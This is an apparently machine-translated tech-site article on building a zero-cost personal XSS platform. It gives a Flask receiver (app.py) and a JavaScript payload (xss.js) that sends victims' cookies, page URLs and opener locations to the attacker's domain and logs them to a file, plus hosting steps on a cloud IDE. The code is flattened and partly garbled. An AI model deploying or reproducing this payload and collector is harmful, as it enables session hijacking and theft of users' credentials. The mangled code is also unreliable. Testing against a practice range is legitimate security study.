Shulou(Shulou.com)05/31 Report--

This article introduces how to build a personal XSS platform with zero cost. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

Background introduction of 0x00

Although there are many free XSS platforms on the network, the user experience is often not very good. It often takes a long time to load when configuring, and it is difficult to modify the scripts on their own. At the same time, there are also some problems such as possible background data leakage. The purpose of this paper is to build a temporary personal private public network XSS platform through other technical ways.

Use technology and components:

Cloud Studio:Coding 's cloud development environment, which supports dynamic page hosting

Python2.7/3.5+flask

The js code refers to the BlueLotus_XSSReceiver platform code and can be extended by itself.

0x01 Code and its principle

The platform uses two code files:

Xss.js:xss leverages scripts and is extensible

App.py: the main file of the website. The specific principle is very simple. Mount the xss to the root directory of the website using the script, and embed the following poc into the xss leak when you use it.

/ / if it is too long, you can generate your own short chain.

After visiting the website, you will run a js script to request an image of the specified source, and then construct a get request from this source to the / rec directory. The function of mounting this directory is to process the parameters and write them to the text.txt file, which saves the cookie and other data we finally need.

App.py#-*-coding: utf-8-*-from flask import Flaskfrom flask import render_templatefrom flask import requestimport osimport datetimeAPP_ROOT = os.path.dirname (os.path.abspath (_ _ file__)) TXT_PATH = os.path.join (APP_ROOT 'templates') app = Flask (_ name__) @ app.route (' /') def xss (): return render_template ('xss.js') @ app.route (' / rec') def rec (): x=request.args ip=request.headers.getlist ("X-Forwarded-For") [0] with open (os.path.join (TXT_PATH, 'text.txt') 'averse') as f: f.write ('- -\ n') print 'ok' f.write (datetime.datetime.now (). Strftime ('% Y-%m-%d% HV% MV% S') +'\ n') f.write ('ip:'+ ip+'\ n') F.write ('location:' + x ['location'] +'\ n') f.write ('toplocation:' + x ['toplocation'] +'\ n') f.write ('cookie:' + x ['cookie'] +'\ n') f.write ('opener:' + x ['opener'] +'\ n') return 'ok'if _ name__ = =' _ main _ _': app.run (host='0.0.0.0') xss.jsvar website = "https://( personal domain name) / rec" (function () {(new Image ()). Src = website +'? location=' + escape ((function () {try {return _ document.location.href} catch (e) {return''}}) ()) +'& toplocation=' + escape ((function () {try {return top.location.href} catch (e) { Return''}) () +'& cookie=' + escape ((function () {try {return [xss_clean]} catch (e) {return'}}) () +'& opener=' + escape ((function ()) {try {return (window.opener & window.opener.location.href)? Window.opener.location.href:''} catch (e) {return''}) ());}) (); 0x02 specific deployment

Visit the domestic hosting platform Coding, register an account and log in, and real name authentication may be required to publish the website.

Click Cloud Studio on the right to enter the workspace

Initialization

Click New Workspace, set the workspace name XssPlatform, preset environment Ubuntu 18.04. the code source is empty.

Click to enter and select Python Demo

After entering, you will find that there is a problem. The installation execution command is not recorded beforehand. The command specifically means to install the relevant python modules needed by the program and run app.py.

Cat requirements.txt | xargs sudo pip install-I http://pypi.douban.com/simple-- trusted-host pypi.douban.com & & python app.py

Close the box in the lower right corner, check the prompt and find that the pip command cannot be found. We will install it manually.

Apt-get update # Update Software Source

Apt-get upgrade # update software

Apt-get install python-pip # install python-pip components

After the installation is successful, re-execute the command we recorded to run the program

After running successfully, press ctrl+shift+p to start the command panel, enter preview, click Open Preview Tab in the command list, click and select my first python project to view the preview of the web page and record the url for later use.

Platform configuration

Ctrl+c ends the python process, opens app.py, and copies the code given in the article

Rename the index.html under templates to xss.js, copy the code, and replace the personal domain name with the recorded web page url

Enter python app.py in the console to run the website, then enter the domain name in the browser to access it, and display the content of the js code as successful configuration.

Usage test

Use pickachu open source vulnerability range for testing, enter reflective xss (post), log in to your account, enter to use poc, and click submit

You can see that there is an extra text file text.txt in the Cloud Studio, which is the recorded cookie and other information.

Considerations for 0x03

Only provides a simple platform model, more or an expansion of ideas, do not use it for illegal purposes.

In addition, due to the relevant restrictions of Cloud Studio, the platform can only run for up to 4 hours a day, and cannot be accessed after shutdown.

On how to build a zero-cost personal XSS platform to share here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.